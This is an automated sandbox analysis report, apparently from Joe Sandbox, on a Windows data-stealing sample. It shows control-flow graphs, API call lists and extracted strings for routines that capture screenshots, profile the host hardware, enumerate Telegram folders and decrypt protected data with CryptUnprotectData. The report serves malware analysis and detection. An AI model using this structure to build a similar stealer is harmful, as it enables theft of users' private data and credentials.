                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 359e412f215ee98b444bbdcc4d48239925d2217eaf52ca1d7accbfdd9e2e18c1
                                          • Instruction ID: c4896b2f679d22bfa9ed979748d0f0373be9973f25d789e49a04df6f8783bf5c
                                          • Opcode Fuzzy Hash: 359e412f215ee98b444bbdcc4d48239925d2217eaf52ca1d7accbfdd9e2e18c1
                                          • Instruction Fuzzy Hash: 37142471D04A2CCACB66DF28CC916AEB775BF46384F1082C9D50E7A241EB359AD1DF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2537 38f4ba2-38f4bb2 2538 38f4bb8-38f4beb call 38f46d4 2537->2538 2539 38f4e23-38f4e26 2537->2539 2542 38f4e22 2538->2542 2543 38f4bf1-38f4c00 call 38f46d4 2538->2543 2542->2539 2543->2542 2546 38f4c06-38f4c5f KiUserCallbackDispatcher GetSystemMetrics call 38f3576 * 4 GetDC 2543->2546 2555 38f4c65-38f4c72 GetCurrentObject 2546->2555 2556 38f4e20-38f4e21 2546->2556 2557 38f4c78-38f4c89 GetObjectW 2555->2557 2558 38f4e17-38f4e1a ReleaseDC 2555->2558 2556->2542 2557->2558 2559 38f4c8f-38f4d1e call 38f35db DeleteObject CreateCompatibleDC 2557->2559 2558->2556 2559->2558 2562 38f4d24-38f4d3f CreateDIBSection 2559->2562 2563 38f4d45-38f4d4f SelectObject 2562->2563 2564 38f4e10-38f4e11 DeleteDC 2562->2564 2565 38f4e09-38f4e0a DeleteObject 2563->2565 2566 38f4d55-38f4d74 BitBlt 2563->2566 2564->2558 2565->2564 2566->2565 2567 38f4d7a-38f4d8c call 38f3508 2566->2567 2567->2565 2570 38f4d8e-38f4df9 call 38f354b * 3 call 38f3d76 2567->2570 2578 38f4dfe-38f4e04 call 38f3536 2570->2578 2578->2565
                                          APIs
                                            • Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
                                            • Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3
                                          • KiUserCallbackDispatcher.NTDLL(0000004C), ref: 038F4C13
                                          • GetSystemMetrics.USER32(0000004D), ref: 038F4C1A
                                          • GetDC.USER32(00000000), ref: 038F4C55
                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 038F4C68
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 038F4C81
                                          • DeleteObject.GDI32(00000000), ref: 038F4CB3
                                          • CreateCompatibleDC.GDI32(00000000), ref: 038F4D14
                                          • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 038F4D35
                                          • SelectObject.GDI32(00000000,00000000), ref: 038F4D47
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,038F2468,00000000,?,?,00CC0020), ref: 038F4D6C
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                            • Part of subcall function 038F3D76: EnterCriticalSection.KERNEL32(038F84D4,00000000,00000000,00000000,?,?,?,?,?,038F3EEB,00000000,00000000,00000000,00000000,00000000), ref: 038F3D88
                                            • Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
                                            • Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544
                                          • DeleteObject.GDI32(00000000), ref: 038F4E0A
                                          • DeleteDC.GDI32(00000000), ref: 038F4E11
                                          • ReleaseDC.USER32(00000000,00000000), ref: 038F4E1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Object$HeapSection$CriticalDelete$CreateEnterProcess$AllocateCallbackCompatibleCurrentDispatcherFreeHandleLeaveLibraryLoadMetricsModuleReleaseSelectSystemUser
                                          • String ID: ($- ScreenSize: {lWidth=%d, lHeight=%d}$2$6$U$er32$gdi3
                                          • API String ID: 1387450592-1028866296
                                          • Opcode ID: 2f529775e3c980e0d01bf7ed9ce5a03f3638788d18248d8264e5696719b77070
                                          • Instruction ID: 1463def5920e2bb78f7b08fce686880d6082afc9f3313e0aedf12db9c77ee9ba
                                          • Opcode Fuzzy Hash: 2f529775e3c980e0d01bf7ed9ce5a03f3638788d18248d8264e5696719b77070
                                          • Instruction Fuzzy Hash: E8716B75D00308AFDB21DBE9DC55BAEBB79EF88710F14409AE605EB290DB709A048B65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2580 38f1000-38f1018 2581 38f101e-38f1028 2580->2581 2582 38f1412-38f1418 2580->2582 2581->2582 2583 38f102e-38f1037 call 38f407d 2581->2583 2583->2582 2586 38f103d-38f1059 call 38f3508 * 2 2583->2586 2591 38f105f-38f1061 2586->2591 2592 38f1404-38f140d call 38f3536 * 2 2586->2592 2591->2592 2593 38f1067-38f116d call 38f3600 FindFirstFileW 2591->2593 2592->2582 2599 38f13d5-38f1401 call 38f3576 * 3 2593->2599 2600 38f1173-38f1192 call 38f363b * 2 2593->2600 2599->2592 2610 38f13ba 2600->2610 2611 38f1198-38f11b7 call 38f3600 2600->2611 2613 38f13bd-38f13cf FindNextFileW 2610->2613 2616 38f11bd-38f11cf call 38f372b 2611->2616 2617 38f1769-38f1770 2611->2617 2613->2599 2613->2600 2616->2617 2622 38f11d5-38f11e7 call 38f372b 2616->2622 2617->2610 2619 38f1776-38f1794 call 38f363b call 38f3b60 2617->2619 2629 38f17eb-38f17f0 2619->2629 2630 38f1796-38f17e3 call 38f3508 call 38f3600 call 38f3eb6 2619->2630 2622->2617 2628 38f11ed-38f120f call 38f363b call 38f3b60 2622->2628 2649 38f171e-38f1749 call 38f40ba 2628->2649 2650 38f1215-38f121b 2628->2650 2633 38f199b-38f19d2 call 38f3600 call 38f3eb6 2629->2633 2634 38f17f6-38f17fb 2629->2634 2630->2629 2647 38f19d7-38f19da 2633->2647 2634->2633 2635 38f1801-38f1806 2634->2635 2635->2633 2640 38f180c-38f1811 2635->2640 2640->2633 2644 38f1817-38f181c 2640->2644 2644->2633 2648 38f1822-38f1827 2644->2648 2647->2613 2648->2633 2652 38f182d-38f1832 2648->2652 2660 38f174f-38f175a call 38f372b 2649->2660 2661 38f152d-38f1534 call 38f3536 2649->2661 2650->2649 2654 38f1221-38f1227 2650->2654 2652->2633 2656 38f1838-38f183d 2652->2656 2654->2649 2658 38f122d-38f1233 2654->2658 2656->2633 2659 38f1843-38f1848 2656->2659 2658->2649 2662 38f1239-38f123f 2658->2662 2659->2633 2663 38f184e-38f1853 2659->2663 2660->2661 2673 38f1760-38f1762 2660->2673 2661->2610 2662->2649 2666 38f1245-38f124b 2662->2666 2663->2633 2668 38f1859-38f185e 2663->2668 2666->2649 2667 38f1251-38f1257 2666->2667 2667->2649 2671 38f125d-38f1263 2667->2671 2668->2610 2672 38f1864-38f1878 call 38f446c 2668->2672 2671->2649 2674 38f1269-38f126f 2671->2674 2679 38f187e-38f1883 2672->2679 2680 38f14b4-38f14be call 38f3536 2672->2680 2673->2617 2674->2649 2676 38f1275-38f127b 2674->2676 2676->2649 2678 38f1281-38f1287 2676->2678 2678->2649 2681 38f128d-38f1293 2678->2681 2679->2680 2683 38f1889-38f18a1 call 38f36f1 2679->2683 2680->2610 2681->2649 2684 38f1299-38f129f 2681->2684 2683->2680 2689 38f18a7-38f18bf call 38f36f1 2683->2689 2684->2649 2687 38f12a5-38f12ab 2684->2687 2687->2649 2690 38f12b1-38f12b7 2687->2690 2689->2680 2695 38f18c5-38f18db call 38f369c 2689->2695 2690->2649 2692 38f12bd-38f12c3 2690->2692 2692->2649 2694 38f12c9-38f12cf 2692->2694 2694->2649 2696 38f12d5-38f12db 2694->2696 2695->2680 2701 38f18e1-38f18ed call 38f3625 2695->2701 2696->2649 2698 38f12e1-38f12e7 2696->2698 2698->2649 2700 38f12ed-38f12f3 2698->2700 2700->2649 2702 38f12f9-38f12ff 2700->2702 2708 38f14ad-38f14af call 38f3536 2701->2708 2709 38f18f3-38f1906 call 38f1a62 2701->2709 2702->2649 2704 38f1305-38f130b 2702->2704 2704->2649 2705 38f1311-38f1317 2704->2705 2705->2649 2707 38f131d-38f1323 2705->2707 2707->2649 2710 38f1329-38f132f 2707->2710 2708->2680 2709->2708 2716 38f190c-38f1911 2709->2716 2710->2649 2713 38f1335-38f133b 2710->2713 2713->2649 2715 38f1341-38f1347 2713->2715 2717 38f134d-38f1353 2715->2717 2718 38f168c-38f16c1 call 38f40ba 2715->2718 2716->2708 2719 38f1917-38f1929 call 38f1c94 2716->2719 2717->2718 2721 38f1359-38f135f 2717->2721 2718->2680 2728 38f16c7-38f16d2 call 38f372b 2718->2728 2726 38f198e-38f1996 call 38f3536 2719->2726 2727 38f192b-38f1974 call 38f1ba5 call 38f3600 call 38f3d76 2719->2727 2721->2718 2724 38f1365-38f136b 2721->2724 2729 38f1662-38f1687 EnterCriticalSection call 38f4e27 LeaveCriticalSection 2724->2729 2730 38f1371-38f1377 2724->2730 2726->2708 2762 38f1979-38f198b call 38f3536 * 2 2727->2762 2728->2680 2743 38f16d8-38f1719 call 38f3efc 2728->2743 2729->2610 2730->2729 2733 38f137d-38f1383 2730->2733 2738 38f1419-38f141f 2733->2738 2739 38f1389-38f13b4 call 38f3efc 2733->2739 2745 38f1425-38f1447 call 38f40ba 2738->2745 2746 38f14c3-38f14c9 2738->2746 2739->2610 2743->2680 2745->2680 2764 38f1449-38f1454 call 38f372b 2745->2764 2751 38f14cb-38f14ed call 38f40ba 2746->2751 2752 38f1539-38f153f 2746->2752 2751->2661 2766 38f14ef-38f14fa call 38f372b 2751->2766 2756 38f1576-38f157c 2752->2756 2757 38f1541-38f1563 call 38f40ba 2752->2757 2760 38f165b 2756->2760 2761 38f1582-38f1588 2756->2761 2757->2661 2770 38f1565-38f1570 call 38f372b 2757->2770 2760->2729 2761->2760 2767 38f158e-38f1594 2761->2767 2762->2726 2764->2680 2777 38f1456-38f14a7 call 38f3508 call 38f3600 call 38f3eb6 2764->2777 2766->2661 2785 38f14fc 2766->2785 2773 38f15a9-38f15af 2767->2773 2774 38f1596-38f159d 2767->2774 2770->2661 2788 38f1572-38f1574 2770->2788 2780 38f15e3-38f160b call 38f40ba 2773->2780 2781 38f15b1-38f15b7 2773->2781 2774->2773 2777->2708 2780->2661 2793 38f1611-38f161c call 38f372b 2780->2793 2781->2780 2787 38f15b9-38f15bf 2781->2787 2791 38f14fe-38f1527 call 38f3efc 2785->2791 2787->2780 2792 38f15c1-38f15c7 2787->2792 2788->2791 2791->2661 2792->2780 2796 38f15c9-38f15cf 2792->2796 2793->2661 2805 38f1622-38f1656 call 38f3efc 2793->2805 2796->2780 2800 38f15d1-38f15d8 call 38f1000 2796->2800 2804 38f15dd-38f15de 2800->2804 2804->2610 2805->2661
                                          APIs
                                          • FindNextFileW.KERNELBASE(?,?), ref: 038F13C7
                                            • Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • FindFirstFileW.KERNELBASE(00000000,?,012BFDF0,?), ref: 038F1161
                                            • Part of subcall function 038F3EFC: FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 038F3F5D
                                            • Part of subcall function 038F3EFC: FindNextFileW.KERNEL32(038F1710,?), ref: 038F3FFE
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F1668
                                          • LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F1681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CriticalFindSection$EnterFirstHeapLeaveNext$AllocateAttributesProcess
                                          • String ID: $Lr$%s%s$%s\%s$%s\*$7a?=$Telegram
                                          • API String ID: 1893179121-1537637304
                                          • Opcode ID: d6e44745cc9ea26c908703abf8f6693d767b063020880988378163a316bcf9a6
                                          • Instruction ID: 3013a86b844f3630e50a40cbedfe0fd918b9c2f7192e60f414926cddefdfd054
                                          • Opcode Fuzzy Hash: d6e44745cc9ea26c908703abf8f6693d767b063020880988378163a316bcf9a6
                                          • Instruction Fuzzy Hash: 6F322965E007149FDF25EBE88848BBDF3B59F94310F1840DAD605EB294EB748E85CB92

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2857 38f2054-38f20a5 call 38f3508 2860 38f20a7-38f20c6 2857->2860 2861 38f2103-38f2115 GetCurrentHwProfileA 2857->2861 2864 38f20ce-38f20d4 2860->2864 2865 38f20c8-38f20cc 2860->2865 2862 38f212d-38f219e GetSystemInfo call 38f35db call 38f3536 GlobalMemoryStatusEx call 38f35db 2861->2862 2863 38f2117-38f212a call 38f35db 2861->2863 2881 38f21db-38f21ec EnumDisplayDevicesA 2862->2881 2863->2862 2869 38f20df-38f20e5 2864->2869 2870 38f20d6-38f20dd 2864->2870 2868 38f20ee-38f20f9 call 38f354b 2865->2868 2871 38f20fc-38f2101 2868->2871 2869->2871 2872 38f20e7-38f20eb 2869->2872 2870->2868 2871->2860 2871->2861 2872->2868 2882 38f21ee-38f21f4 2881->2882 2883 38f21a0-38f21a9 2881->2883 2884 38f21ab-38f21c7 call 38f35db 2883->2884 2885 38f21ca-38f21da 2883->2885 2884->2885 2885->2881
                                          APIs
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 038F210B
                                          • GetSystemInfo.KERNELBASE(?,?,0000011C), ref: 038F2132
                                          • GlobalMemoryStatusEx.KERNELBASE(?), ref: 038F2166
                                          • EnumDisplayDevicesA.USER32(00000000,00000002,?,00000001), ref: 038F21E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocateCurrentDevicesDisplayEnterEnumGlobalInfoLeaveMemoryProcessProfileStatusSystem
                                          • String ID: - CPU: %s (%d cores)$- HWID: %s$- RAM: %d GB$- VideoAdapter #%d: %s$@
                                          • API String ID: 330852582-565344305
                                          • Opcode ID: b94a30f862a5b7794748ba76c252246a964a13e9479ae65fc2b8c02786381db7
                                          • Instruction ID: 4db428d2a3600e34c82789d7555bd4873286b43c36f53b8d17e9b52f2c06b673
                                          • Opcode Fuzzy Hash: b94a30f862a5b7794748ba76c252246a964a13e9479ae65fc2b8c02786381db7
                                          • Instruction Fuzzy Hash: 6D41B2756083059FE721DF58C881FABB7A8EBC8350F0449ADFA85CB241E770D944CBA2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2888 38f4e27-38f4e47 2889 38f4e49-38f4e8c call 38f3600 call 38f407d 2888->2889 2890 38f4e98-38f4ed9 call 38f3508 * 2 call 38f3600 FindFirstFileW 2888->2890 2900 38f5198-38f519e 2889->2900 2901 38f4e92 2889->2901 2903 38f4edf-38f4ef9 call 38f3600 2890->2903 2904 38f5183-38f5192 call 38f3536 * 2 2890->2904 2901->2890 2910 38f4eff-38f4f06 2903->2910 2911 38f4fb1-38f4fc7 call 38f363b 2903->2911 2904->2900 2913 38f4f0c-38f4f1e call 38f372b 2910->2913 2914 38f516b-38f517d FindNextFileW 2910->2914 2911->2914 2919 38f4fcd-38f50ab call 38f3600 call 38f3eb6 call 38f363b call 38f3600 call 38f407d 2911->2919 2913->2914 2920 38f4f24-38f4f36 call 38f372b 2913->2920 2914->2903 2914->2904 2919->2914 2943 38f50b1-38f5165 call 38f363b call 38f3600 call 38f3eb6 2919->2943 2920->2914 2927 38f4f3c-38f4f5b call 38f363b call 38f3b60 2920->2927 2936 38f4f5d-38f4f62 2927->2936 2937 38f4f84-38f4fac EnterCriticalSection call 38f4e27 LeaveCriticalSection 2927->2937 2936->2937 2939 38f4f64-38f4f6b 2936->2939 2937->2914 2939->2914 2942 38f4f71-38f4f79 call 38f4e27 2939->2942 2947 38f4f7e-38f4f7f 2942->2947 2949 38f516a 2943->2949 2947->2949 2949->2914
                                          APIs
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000), ref: 038F4ECD
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F4F89
                                            • Part of subcall function 038F4E27: LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F4FA6
                                          • FindNextFileW.KERNELBASE(?,?), ref: 038F5175
                                            • Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CriticalFindSection$AttributesEnterFirstLeaveNext
                                          • String ID: %s\%s$%s\*$Telegram
                                          • API String ID: 648860119-4994844
                                          • Opcode ID: cd68c2d70a3e62e54383de9541b241d1114cbe39e8944c0452110c32dc8c58d8
                                          • Instruction ID: 1f7b1b97171410d07009e4afda04bc1d7ab2bb422ba495bcfb539799898626eb
                                          • Opcode Fuzzy Hash: cd68c2d70a3e62e54383de9541b241d1114cbe39e8944c0452110c32dc8c58d8
                                          • Instruction Fuzzy Hash: 8CA19A25A14748ADEF10EBE4EC45BBEB375EF84710F10509AE604EB2A0F7B14A85875A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5796 38f1d3c-38f1d4e 5797 38f1f25-38f1f2a 5796->5797 5798 38f1d54-38f1d5e 5796->5798 5798->5797 5799 38f1d64-38f1d8e call 38f3600 FindFirstFileW 5798->5799 5799->5797 5802 38f1d94-38f1dd8 call 38f3508 call 38f363b 5799->5802 5807 38f1ddd-38f1e02 call 38f363b * 2 5802->5807 5812 38f1e08-38f1e21 call 38f3600 5807->5812 5813 38f1f01-38f1f0f FindNextFileW 5807->5813 5819 38f1e54-38f1e59 5812->5819 5820 38f1e23-38f1e33 call 38f372b 5812->5820 5815 38f1f1c-38f1f20 call 38f3536 5813->5815 5816 38f1f11-38f1f17 5813->5816 5815->5797 5816->5807 5822 38f1e5f-38f1e69 5819->5822 5823 38f1ef2-38f1efd 5819->5823 5820->5819 5826 38f1e35-38f1e45 call 38f372b 5820->5826 5822->5823 5825 38f1e6f-38f1e7c call 38f408d 5822->5825 5823->5813 5830 38f1e7e-38f1e95 call 38f363b call 38f3b60 5825->5830 5831 38f1eeb-38f1eed call 38f3536 5825->5831 5826->5819 5834 38f1e47-38f1e4a call 38f1d3c 5826->5834 5841 38f1eac-38f1edc call 38f3600 call 38f3eb6 5830->5841 5842 38f1e97-38f1e9c 5830->5842 5831->5823 5839 38f1e4f 5834->5839 5839->5823 5848 38f1ee1-38f1ee4 5841->5848 5842->5841 5843 38f1e9e-38f1ea3 5842->5843 5843->5841 5845 38f1ea5-38f1eaa 5843->5845 5845->5831 5845->5841 5848->5831
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?), ref: 038F1D83
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • FindNextFileW.KERNELBASE(00000000,?), ref: 038F1F07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalFileFindHeapSection$AllocateEnterFirstLeaveNextProcess
                                          • String ID: %s%s$%s\%s$%s\*
                                          • API String ID: 3555643018-2064654797
                                          • Opcode ID: 2502c53f1bdadd10e011cd683d0b49f6ef6bb4c6bf0e55799951f23124db7461
                                          • Instruction ID: 513fbe1810cd2b138bcc05ca99616c242aa82c27ad01ec470a9f8090b09c22ed
                                          • Opcode Fuzzy Hash: 2502c53f1bdadd10e011cd683d0b49f6ef6bb4c6bf0e55799951f23124db7461
                                          • Instruction Fuzzy Hash: DE41E3792047418FCB14EFA8D844A2EB3E4EF94304F04089DEA95CB291EB75CA058797

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5896 38f1c94-38f1ccf call 38f46d4 5899 38f1d2f-38f1d3b 5896->5899 5900 38f1cd1-38f1cf8 call 38f3576 CryptUnprotectData 5896->5900 5903 38f1cfa-38f1d03 5900->5903 5904 38f1d05-38f1d0a 5900->5904 5903->5899 5904->5899 5905 38f1d0c-38f1d29 CryptProtectData 5904->5905 5905->5899
                                          APIs
                                            • Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
                                            • Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 038F1CF3
                                          • CryptProtectData.CRYPT32(?,?,00000000,00000000,00000000,00000000,?), ref: 038F1D29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CryptData$HandleLibraryLoadModuleProtectUnprotect
                                          • String ID: CRYPT32.dll$Poverty is the parent of crime.
                                          • API String ID: 3642467563-1885057629
                                          • Opcode ID: 50f42dad1b6fa20d2ff6b840b50d1262d31c18eecdfef8285369bdee27b27a1d
                                          • Instruction ID: 450a0df4bb5df56042846b96f9bea7be6b51e216699d1f53293bf0c952f576cd
                                          • Opcode Fuzzy Hash: 50f42dad1b6fa20d2ff6b840b50d1262d31c18eecdfef8285369bdee27b27a1d
                                          • Instruction Fuzzy Hash: 36113EB5D0020CAFDB10DFD5C884CEEBBBDEF48250F1445A6E905A3240E7745E05CAA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 38f21f5-38f2212 InitializeCriticalSectionAndSpinCount 1 38f2219-38f222f CreateMutexA 0->1 2 38f2214 0->2 4 38f2678-38f267a ExitProcess 1->4 5 38f2235-38f2240 GetLastError 1->5 3 38f2680 2->3 5->4 6 38f2246-38f2255 call 38f3bd2 5->6 9 38f264f-38f266f DeleteCriticalSection 6->9 10 38f225b-38f2285 call 38f3576 call 38f47e6 6->10 9->4 15 38f228b-38f22d0 call 38f35db call 38f484b 10->15 16 38f2647-38f264a call 38f3536 10->16 15->16 22 38f22d6-38f230a call 38f3508 * 3 15->22 16->9 29 38f25df-38f262e call 38f3d76 call 38f3536 * 4 call 38f3bfb 22->29 30 38f2310-38f2317 22->30 59 38f2631-38f2637 call 38f536d 29->59 30->29 32 38f231d-38f2324 30->32 32->29 34 38f232a-38f2366 call 38f46d4 32->34 34->29 39 38f236c-38f2381 call 38f1f2d 34->39 45 38f2383-38f23ba call 38f46d4 39->45 46 38f23c1-38f23db 39->46 45->46 53 38f23bc 45->53 54 38f23dd-38f23df ExitProcess 46->54 55 38f23e5-38f2410 call 38f363b 46->55 53->3 64 38f241a-38f2445 call 38f363b 55->64 65 38f2412-38f2414 ExitProcess 55->65 63 38f263c-38f2643 59->63 63->16 66 38f2645 63->66 70 38f244f-38f24bd call 38f363b call 38f4ba2 CreateThread * 2 WaitForMultipleObjects call 38f19df call 38f2054 64->70 71 38f2447-38f2449 ExitProcess 64->71 66->59 80 38f24c7-38f24ce 70->80 81 38f2501-38f251d ObtainUserAgentString 80->81 82 38f24d0-38f24d9 80->82 85 38f251f-38f2532 call 38f35db 81->85 86 38f2535-38f25a0 call 38f5239 * 6 call 38f3508 81->86 83 38f24ff 82->83 84 38f24db-38f24f5 82->84 83->80 84->83 85->86 104 38f25b2-38f25da call 38f363b call 38f5239 * 2 call 38f3536 86->104 105 38f25a2-38f25ac GetModuleFileNameW 86->105 104->29 105->104
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(038F84D4,00000DA3), ref: 038F220A
                                          • CreateMutexA.KERNELBASE(00000000,00000000,1e7f31ac-1494-47cc-9633-054c20e7432e), ref: 038F2222
                                          • GetLastError.KERNEL32 ref: 038F2235
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountCreateCriticalErrorInitializeLastMutexSectionSpin
                                          • String ID: $$$d.log$- OperationSystem: %d:%d:%d$- UserAgent: %s$1e7f31ac-1494-47cc-9633-054c20e7432e$@$kernel32$shell32$systemd
                                          • API String ID: 2005177960-3436640841
                                          • Opcode ID: 025186c03858b4c4f0f06d9789e350f38f9e3a3a24facc8fbae1ded862f9cccf
                                          • Instruction ID: e2f8a6065c1aa5d2d7d7c4910dd2deb55fc0c10910fa2da491963c98309a28b9
                                          • Opcode Fuzzy Hash: 025186c03858b4c4f0f06d9789e350f38f9e3a3a24facc8fbae1ded862f9cccf
                                          • Instruction Fuzzy Hash: 2EC1BE38A04748AFEB11EBE8E809FAD7B75EF55300F0440D9E741EA2D5DBB54A45CB22

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F44F5
                                          • LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F4541
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F45C4
                                          • LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F45FD
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F463A
                                          • LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F467D
                                          • EnterCriticalSection.KERNEL32(038F84D4), ref: 038F4696
                                          • LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F46BF
                                            • Part of subcall function 038F42EC: GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation,00000000,00000000,00000000,?,?,?,?,038F4574), ref: 038F4305
                                            • Part of subcall function 038F42EC: GetProcAddress.KERNEL32(00000000), ref: 038F430E
